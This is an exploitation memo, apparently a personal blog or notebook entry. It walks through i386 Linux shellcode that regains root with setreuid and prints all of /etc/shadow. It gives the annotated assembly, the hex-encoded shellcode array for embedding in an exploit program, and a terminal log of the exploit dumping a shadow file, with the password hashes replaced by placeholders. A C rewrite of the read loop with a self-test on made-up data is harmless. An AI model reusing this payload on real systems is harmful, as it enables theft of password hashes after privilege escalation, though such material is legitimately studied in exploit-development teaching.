 Note of Exploiting
This is a memo on creating a payload. My earlier print_shadow payload read only the first 256 bytes of /etc/shadow, so I refined print_shadow.s into print_shadow_02.s. The new payload reads /etc/shadow from the top to the end of the file.
When the read system call reaches the end of the file it returns 0. When an error happens it returns -1. Otherwise it returns the number of bytes read.
So I use this behaviour: after each read system call the payload checks the eax register with the test instruction. If eax is 0 the job is complete; otherwise the payload assumes the file has more data and goes round the loop again. Note that only the zero case is tested, so a -1 error return would not be told apart from data; here open succeeds as root and read does not fail.
Inside the loop the payload reads one byte from the file and writes that one byte to the screen, repeating until end of file.
.globl main
main:
    pushl   %ebp
    movl    %esp,   %ebp
    # setreuid(0, 0): regain root. Syscall 0x46 (70) is sys_setreuid on
    # i386 (sys_setuid is 0x17); ebx = ruid = 0, ecx = euid = 0
    xorl   %eax,   %eax
    mov    $0x46,  %al
    xorl   %ebx,   %ebx
    xorl   %ecx,   %ecx
    int    $0x80
    jmp ONE                     # jmp/call trick to get the string address
TWO:
    # open("/etc/shadow", O_RDONLY): syscall 5
    popl   %ebx                 # ebx = return address pushed by call = the string
    movb   $0x5,   %al          # eax is 0 after a successful setreuid
    movb   %cl,    11(%ebx)     # cl is 0: write the terminating NUL at run time
    int    $0x80                # ecx = 0 = O_RDONLY
    movl   %eax,   %ebx         # ebx = file descriptor
loop:
    # read(fd, esp, 1): syscall 3, one byte into the top of the stack
    xorl   %edx,   %edx
    inc    %edx                 # edx = 1 byte
    movl   %esp,   %ecx         # ecx = buffer
    xorl   %eax,   %eax
    movb   $0x3,   %al
    int    $0x80
    movl   %ebx,   %esi         # save fd, ebx is reused for stdout below
    test   %eax,   %eax         # 0 = end of file (a -1 error is not distinguished)
    jz     done
    # write(1, esp, 1): syscall 4; eax is 1 here, so only al needs setting
    movb   $0x4,   %al
    xorl   %ebx,   %ebx
    movb   $0x1,   %bl          # ebx = 1 = stdout
    int    $0x80
    movl   %esi,   %ebx         # restore fd
    jmp    loop
done:
    # close(fd): syscall 6
    movb   $0x6,   %al
    movl   %esi,   %ebx
    int    $0x80
    # exit(0): syscall 1
    movb   $0x1,   %al
    xorl   %ebx,   %ebx
    int    $0x80
ONE:
    call    TWO                 # pushes the address of the string below
    .string "/etc/shadow"
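The same read-until-EOF loop written in C, as an added example that is not the original payload: it handles the -1 return from read(2) that the shellcode only tests against zero, retries EINTR and short writes, and checks itself by pushing a constructed shadow-style sample (not real data) through a pair of pipes one byte at a time, as the payload does. The function names copy_until_eof, dump_file and roundtrip_check and the sample text are my own.

```c
/* Added example, not the page's payload: the read-until-EOF loop in C
 * with the error case the shellcode ignores. read(2) returns 0 at EOF,
 * -1 on error, and the byte count otherwise. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Copy in_fd to out_fd, at most `chunk` bytes per read, until EOF.
 * Returns the number of bytes copied, or -1 if read or write failed. */
long copy_until_eof(int in_fd, int out_fd, size_t chunk)
{
    char buf[4096];
    long total = 0;
    if (chunk == 0 || chunk > sizeof buf)
        chunk = sizeof buf;
    for (;;) {
        ssize_t n = read(in_fd, buf, chunk);
        if (n == 0)                 /* EOF: the only case the payload tests (jz done) */
            return total;
        if (n < 0) {
            if (errno == EINTR)     /* interrupted by a signal, just retry */
                continue;
            return -1;              /* the -1 case the payload does not check */
        }
        ssize_t off = 0;            /* write(2) may write less than asked */
        while (off < n) {
            ssize_t w = write(out_fd, buf + off, (size_t)(n - off));
            if (w < 0) {
                if (errno == EINTR)
                    continue;
                return -1;
            }
            off += w;
        }
        total += n;
    }
}

/* Open path read-only and dump it to out_fd one byte per read, like the
 * payload. Returns bytes written or -1 if open or the copy failed. */
long dump_file(const char *path, int out_fd)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    long r = copy_until_eof(fd, out_fd, 1);
    close(fd);
    return r;
}

/* Constructed sample standing in for /etc/shadow (not real data). */
static const char SAMPLE[] =
    "root:*:13462:0:99999:7:::\n"
    "defolos:!:13462:0:99999:7:::\n";

/* Self-check: push SAMPLE through copy_until_eof() via two pipes and
 * return the byte count if the output matches the input exactly, else -1. */
long roundtrip_check(void)
{
    int in[2], out[2];
    char back[sizeof SAMPLE];
    size_t len = sizeof SAMPLE - 1, got = 0;

    if (pipe(in) < 0 || pipe(out) < 0)
        return -1;
    if (write(in[1], SAMPLE, len) != (ssize_t)len)
        return -1;
    close(in[1]);                   /* reader sees EOF after the data */
    long n = copy_until_eof(in[0], out[1], 1);
    close(in[0]);
    close(out[1]);
    while (got < len) {             /* read the copy back out of the pipe */
        ssize_t r = read(out[0], back + got, len - got);
        if (r <= 0)
            break;
        got += (size_t)r;
    }
    close(out[0]);
    if (n != (long)len || got != len || memcmp(back, SAMPLE, len) != 0)
        return -1;
    return n;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/etc/shadow";
    if (dump_file(path, STDOUT_FILENO) < 0) {
        perror(path);
        return 1;
    }
    return 0;
}
```

Run as root, or from a setuid-root process, it prints the whole file exactly as the payload does; run as an ordinary user it reports the open(2) failure instead of silently printing nothing, which is the difference the extra -1 check makes.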
I converted this source to byte code and embedded the payload in the C exploit (exploit.c) as follows. The terminating NUL that .string emits is left out of the byte array, so the 82 bytes contain no 0x00; the payload writes that NUL back at run time with movb %cl, 11(%ebx).
char shellcode[]=
"\x55\x89\xe5\x31\xc0\xb0\x46\x31\xdb\x31"
"\xc9\xcd\x80\xeb\x33\x5b\xb0\x05\x88\x4b"
"\x0b\xcd\x80\x89\xc3\x31\xd2\x42\x89\xe1"
"\x31\xc0\xb0\x03\xcd\x80\x89\xde\x85\xc0"
"\x74\x0c\xb0\x04\x31\xdb\xb3\x01\xcd\x80"
"\x89\xf3\xeb\xe3\xb0\x06\x89\xf3\xcd\x80"
"\xb0\x01\x31\xdb\xcd\x80\xe8\xc8\xff\xff"
"\xff\x2f\x65\x74\x63\x2f\x73\x68\x61\x64"
"\x6f\x77"
;
Next, I compiled and ran the exploit:
defolos@glazheim:~/Desktop$ gcc exploit.c
defolos@glazheim:~/Desktop$ ./a.out
sp = 0xbffff918
ret = 0xbffff918
-------exploit---------------
root:<root's password>:13462:0:99999:7:::
daemon:*:13462:0:99999:7:::
bin:*:13462:0:99999:7:::
sys:*:13462:0:99999:7:::
sync:*:13462:0:99999:7:::
games:*:13462:0:99999:7:::
man:*:13462:0:99999:7:::
lp:*:13462:0:99999:7:::
mail:*:13462:0:99999:7:::
news:*:13462:0:99999:7:::
uucp:*:13462:0:99999:7:::
proxy:*:13462:0:99999:7:::
www-data:*:13462:0:99999:7:::
backup:*:13462:0:99999:7:::
list:*:13462:0:99999:7:::
irc:*:13462:0:99999:7:::
gnats:*:13462:0:99999:7:::
nobody:*:13462:0:99999:7:::
Debian-exim:!:13462:0:99999:7:::
defolos:<defolos's password>:13462:0:99999:7:::
identd:!:13463:0:99999:7:::
sshd:!:13463:0:99999:7:::
canna:!:13463:0:99999:7:::
messagebus:!:13463:0:99999:7:::
hal:!:13463:0:99999:7:::
saned:!:13463:0:99999:7:::
gdm:!:13463:0:99999:7:::
defolos@glazheim:~/Desktop$
The payload printed the whole of /etc/shadow to the screen. I now have a method that reads a file to its end and prints it out.